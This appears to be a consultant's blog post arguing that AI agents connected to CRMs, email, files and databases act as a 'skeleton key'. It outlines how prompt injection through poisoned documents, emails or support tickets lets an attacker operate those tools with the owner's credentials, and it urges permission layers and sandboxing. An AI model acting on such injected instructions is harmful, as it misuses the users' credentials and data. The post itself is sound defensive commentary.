When Your AI Agent Becomes a Skeleton Key
The security layer we forgot to build
A security firm scanned a million AI services on the open internet this week. The headline was that most of them shipped with no authentication. It’s a clean stat. It traveled.
But the headline missed the part that actually matters.
Auth-off-by-default is bad, but it’s not new. We saw it with MongoDB, Elasticsearch, every database tool that shipped open and got burned a few years later. The industry knows this pattern. The fix is boring: make auth required, not optional. Run the playbook.
The deeper problem is something most founders shipping AI haven’t thought through yet.
Your AI agent is a skeleton key
Connect an AI to your CRM, your email, your files, your database, and the agent inherits everything those tools can do. It calls them on your behalf. It uses your credentials.
There’s no permission layer between the AI and the tool.
In normal software, there are layers between a user and an action. Authentication, authorization, role-based access, input validation. We didn’t build all that for fun. Every layer is there because we learned the hard way that user input can’t be trusted.
AI agents skip most of it. The agent isn’t a user. It’s a process running with the full permissions of every tool you connected. And the input driving it is natural language, which is the most untrusted input we’ve ever built systems to accept.
So when someone tricks the AI, through prompt injection, a poisoned document, an email it summarizes, a support ticket it reads, they’re not manipulating the AI. They’re operating your tools with your credentials. The model is just the steering wheel.
The blast radius is every tool the agent can call.
Your model is not a security boundary
This is what the research is really showing. Agent platforms exposing their business logic. Inference servers wrapping paid frontier models. Workflow tools with credentials in plaintext. None of it is a one-off mistake. It’s what happens when teams treat AI agents like a normal SaaS feature.
They’re not a normal SaaS feature. They’re closer to giving a stranger root access to half your company and hoping they behave.
I work with founders shipping AI. The thing I keep saying:
Your model is not a security boundary.
The model parses intent and calls tools. That’s the job. It’s not checking what’s safe. It’s not enforcing your business rules. It’s not validating that the person asking to “send invoices to procurement” is the same person whose email it’s signed into.
The boundary has to live somewhere else. In the infrastructure between the model and the tools. Permission layers. Tool allowlists that validate parameters. Sandboxed execution for anything touching code or files. Audit logs the agent can’t quietly rewrite.
Most teams have none of that. They have a model, a list of tools, and a vibe.
The vibe is “we’ll add guardrails later.”
This week’s research is what later looks like.
The question
One question for anyone shipping AI right now:
What can your agent actually do if someone tricks it?
Not what it’s supposed to do. What it can do.
If you can’t answer that in thirty seconds, naming the tools, the parameters, the data sources, the side effects, you don’t have a security model. You have a hope.
I’d rather you have a model.
Last post, “AI Agents Aren’t Coming. They’re Already Taking Market Share,” was about what’s happening to the market. This one is about the gap underneath it.
If you’re shipping AI and want a second pair of eyes on what your agents can actually do, that’s the work I do. Reply here or find me on LinkedIn.


